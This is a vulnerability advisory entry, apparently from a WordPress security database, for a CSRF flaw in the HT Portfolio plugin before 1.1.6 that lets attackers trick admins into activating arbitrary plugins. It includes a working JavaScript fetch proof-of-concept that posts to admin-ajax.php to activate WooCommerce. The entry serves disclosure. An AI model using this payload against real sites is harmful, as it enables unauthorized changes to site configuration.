Lucene search

K
wpexploitLana CodesWPEX-ID:AE5B7776-9D0D-4DB8-81C3-237B16CD9C62
HistoryFeb 28, 2023 - 12:00 a.m.

HT Portfolio < 1.1.6 - Arbitrary Plugin Activation via CSRF

2023-02-2800:00:00
Lana Codes
50
ht portfolio
arbitrary plugin activation
csrf
woocommerce
exploit

0.001 Low

EPSS

Percentile

29.4%

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

activate woocommerce plugin exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=htportfolio_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

29.4%

Related for WPEX-ID:AE5B7776-9D0D-4DB8-81C3-237B16CD9C62